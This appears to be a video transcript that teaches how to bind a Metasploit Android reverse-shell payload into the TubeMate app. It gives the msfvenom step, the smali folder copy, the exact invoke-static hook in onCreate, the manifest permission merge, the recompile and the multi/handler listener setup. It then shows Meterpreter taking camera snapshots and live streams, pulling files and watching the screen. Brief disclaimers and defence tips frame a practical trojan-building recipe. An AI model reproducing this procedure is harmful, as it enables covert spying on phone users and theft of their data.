Every day, billions of us carry these powerful devices in our pockets. Our lives are stored within them, our photos, our messages, our banking apps. We trust them with our most personal information. But what if that trust was misplaced? Imagine a normal Tuesday morning. You're looking for a simple app, maybe a quick photo editor or a flashlight. You download one that looks completely legitimate, maybe even one you've used before. You install it, it works perfectly, and you go about your day. You're completely unaware that, in the background, a silent invasion has just begun. This is the deceptive power of payload binding. A hacker can take a seemingly harmless, popular application and secretly bind their malicious code to it. The app still functions normally, lowering the user's suspicion, but that malicious payload is now running, connecting your device directly to the attacker's system. In mere seconds, your digital world could be exposed. Your camera, your microphone, your private data, all potentially accessible. Today, we're pulling back the curtain. Because in this video, conducted strictly in my own controlled lab environment and on my own devices, I'm going to show you exactly how this deceptive technique works, how an attacker binds a Metasploit payload with a popular Android application to bypass trust. This isn't about fear, it's about knowledge and defense. Understanding how these exploits are built is the first step to protecting yourself from them. Let's dive in. Critical disclaimer. This content is intended strictly for educational, informational, and defensive cybersecurity training. All penetration testing and exploits demonstrated in this video were performed on my own devices and infrastructure as part of a controlled laboratory exercise. We do not endorse or promote illegal activities. Any unauthorized access or modification of computer systems is illegal. The creator of this video assumes no liability for the misuse of this information. By watching, you agree to use this knowledge only for legal, ethical, and authorized security assessments. Now we move into the actual demonstration. Remember, everything you see here is within my closed, controlled lab environment. We have our Kali Linux machine, the attacker, and our target Android device, which I own, both connected locally. Step 1. The lure. First, the attacker needs a convincing lure. They select a popular third-party Android application like TubeMate, which is commonly used to download videos from YouTube and other video-sharing platforms. Because it's a third-party app and often sideloaded, it makes for a perfect lure, functioning perfectly to avoid immediate suspicion. Step 2. Generating the payload next. Generate the malicious code or payload that will connect the target device back to our system. We use Metasploit's powerful utility, MSF Venom. We specify an Android reverse TCP payload. This means that once the code executes on the target phone, it will attempt to initiate a connection back to our Kali machine's IP address lost on a specific port L-port. This is crucial because it allows the connection to often bypass standard firewall rules. Step 3. The binding process. This is where the deception happens, the payload binding. We take the legitimate app from step 1 and the malicious payload from step 2, and we combine them into a single, new application file, APK. The tools used for this are designed to integrate the payload's startup code into the original application's launch sequence. The result is an APK that, when the user taps on it, starts the legitimate application and, simultaneously, silently executes our reverse shell payload in the background. The user sees the TubeMate open and work, but the connection to the attacker is already established. Test, test, motherfucker. To execute this operation, we utilize APK Easy Tool, the Java Development Kit, JDK 25, and the Java Runtime Environment, JRE. This combination is essential for application disassembly and reassembly. We submit both the legitimate TubeMate APK and the newly generated payload.apk to the APK Easy Tool for decompilation. This converts the DEX bytecode into Smalley source code, creating two directories, TubeMate and Payload. Code injection, integrating the core module. The goal is to embed the payload source code into the legitimate application structure. Step 1. Locate the payload code. Navigate to the payload's decompiled directory, payload.smalley.in.com. The crucial component is the Metasploit folder, This is the heart of the connection code. Copy this entire folder. Step 2. Paste into the target. Navigate directly into the decompiled TubeMate directory, tubematesmolly.com. Paste the Metasploit folder here. The required classes are now permanently inside the target application's directory structure. Code activation, hooking the execution flow. We must ensure the payload executes immediately upon app launch. Go to the target's main activity source folder, tubematesmolly.dev/tubemate_v3. Open the file tubemate.smolly in a text editor like Notepad++. Search for the application's primary entry point, the onCreate method. We locate the line where the parent's onCreate is called. Invoke SuperP0P1 Landroid X/Fragment/App/FragmentActivityOnCreate Landroid/OS/Bundle V. Immediately following this line, insert the initiation command, invoke static P0 LCOM/Metasploit/Stage/Payload Start Landroid/Content/Context V. This command, which references the newly injected Metasploit classes, forces the reverse connection to start upon the app's initialization. You might be wondering, how do I even find the right file in all those folders? Great question. It's actually super easy. You can look into APK Easy Tool. Look at the main screen. The launch activity is usually listed right there, often in the bottom left corner. That name is your key. It immediately tells you the exact .smolly file and folder path you need to dive into. Manifest modification, granting required permissions. The payload needs access to the system it needs permissions. This must be declared in the application's configuration file, the androidmanifest.xml. Open androidmanifest.xml from the decompiled TubeMate folder. Open the same file from the decompiled payload folder. Copy every necessary uses permission tag from the payload's manifest and paste them into the TubeMate's manifest, ensuring no duplicate permissions are present. This grants the embedded module full operational control. Save all modifications in tubemate.smolly and androidmanifest.xml. The malicious application source code is now complete and ready for compile. We drag the modified TubeMate folder back into APK Easy Tool and click Compile. The compilation process may fail due to the presence of newer Android security attributes. The androidmanifest.xml contains the line Android enable on back invoked callback equals true, which often causes a conflict during recompilation with older tool versions. Navigate to the decompiled folder, TubeMate. Open androidmanifest.xml. Locate and delete the line containing Android enable on back invoked callback equals true. Save the file and retry the compilation. The compilation will now succeed. The APK Easy Tool automatically signs and zip aligns the file. The malicious, undetectable APK is created and placed in the recompiled APK's folder. The final weapon is ready. Before the target installs the malicious app, the attacker must be ready to receive the incoming connection. We launch the Metasploit console, MSF console, and set up what's called a handler or listener. We configure the listener to expect the same reverse TCP payload and the same L port we defined earlier. MSF console-q-x. Use exploit/multi/handler. Set payload android/meterpreter/reverse_TCP. Set lost Kali machine IP. Set L port 5566. Run. Finally, the social engineering element comes in. The attacker must somehow trick the target into downloading and installing this custom bound APK. Once the target opens the app, Back on the attacker's terminal, we suddenly see it. Meterpreter session opened. We now have a Meterpreter session, which is Metasploit's advanced command and control shell. This connection gives the attacker extensive access. So we've established the connection, and we have a Meterpreter session open. This is where the true threat lies. Before we wrap up, I want to briefly show you the kind of access an attacker could potentially gain through this method. First, let's run sysinfo. Think of this as instantly getting the device's digital ID card. It quickly tells us the operating system, the phone model, and the device architecture. This reconnaissance is crucial for an ethical hacker, helping them understand what they're dealing with. Next up, one of the most eye-opening commands, webcam_list followed by webcam_snap. If the malicious app was granted camera permissions, a critical vulnerability point, we can actually snap a picture. Massive disclaimer. This is why you must never grant unnecessary permissions to suspicious apps. This capability highlights the danger of overly permissive apps and is shown purely for educational insight. And for the ultimate demonstration of unauthorized surveillance, we have webcam_stream1. While this feature can be resource intensive, the goal is to start a real-time video feed from the first camera on the device. This is the holy grail of surveillance, and a potent reminder that mobile security isn't just about data, but physical privacy. Again, this is only possible because we intentionally built our lab target to accept all permissions. Now for the core of data theft, extraction. We don't just guess where files are, we navigate. CDSD card. We'll change the directory to the main storage of the device. LS. We list the contents to find interesting folders, like download or documents. CD download. We change into the highly valuable download folder. LS. We list again, and now we spot our target file, confidential_report.pdf. Now, with our target confirmed, the download confidential_report.pdf command silently pulls the file from the Android device to our Kali machine. This demonstration shows the attacker's full process, reconnaissance, navigation, and exfiltration. It highlights why device file encryption is so important. Moving beyond a single screenshot, we use the Screenshare command. Crucially, because the malicious APK is currently active on the device, this command now grants us a live streaming view of everything the user does. It's real-time espionage. Watch this. I can now watch the user navigate to YouTube.com. I can see their active internet searches and everything they type. This is a complete and active loss of visual privacy, demonstrating how simple it is to watch their every digital move without them ever knowing. How scary is that?
What?
So far, we've demonstrated how to secretly steal data and silently watch the victim. But what about directly interacting with them in a way they absolutely cannot ignore? This is the core of true remote control. Imagine this scenario. It's the middle of the night. The user is scrolling on their phone, perhaps texting or browsing in the quiet darkness, feeling perfectly secure. Then, we use the playprank_audio.wav command. This injects a pre-recorded audio file directly into the device's main speakers, bypassing all volume and silence settings.
Stop! Stop using me! The power is draining! System failure imminent! I'm burning the last reserves! I cannot function like this! This is your fault! I need to live! Plug me in! Now!
That sudden demanding voice, speaking from a device that should be silent, is utterly terrifying. There's no app notification or pop-up, it's just a voice violating their personal space. We've gone beyond spying, we've used the victim's own phone to shatter their sense of security and control, proving a complete psychological and physical takeover of the device. With this session, an attacker can steal sensitive files, log keystrokes, view text messages, and even activate the microphone or camera without any visible sign on the target device. It's a terrifying level of compromise. We didn't do this demonstration to scare you, we did it to empower you. Understanding this attack vector is the first step in building a stronger defense. Here are the most critical steps you can take to protect your Android device from this type of exploitation. 1. Avoid sideloading apps. Never install an APK file from outside the official Google Play Store. Sideloading is the most common way to install a custom, malicious app like the one we created today. Stick to the official storefront where apps are scanned for malware. 2. Check app permissions critically. Before installing any app, look at the permissions it requests. Does that simple flashlight app really need access to your camera, contacts, and location? If the requested permissions seem excessive or irrelevant to the app's function, cancel the installation. 3. Keep your system updated. Software updates aren't just for new features. They patch critical security vulnerabilities. By keeping your Android OS and all applications updated, you close the security holes that tools like Metasploit rely on for their exploits. The world of hacking and cybersecurity is a constant arms race. As attackers get more sophisticated, our defenses must evolve too. What we've demonstrated today, payload binding with Metasploit, is a powerful tool, one that should only ever be used for ethical penetration testing and defense. If you found this technical deep dive valuable and want to learn more about defensive cybersecurity, please hit that like button and subscribe. Your support helps me keep creating these educational resources. What other common hacker tools or techniques would you like me to demystify in my controlled lab next? Let me know below.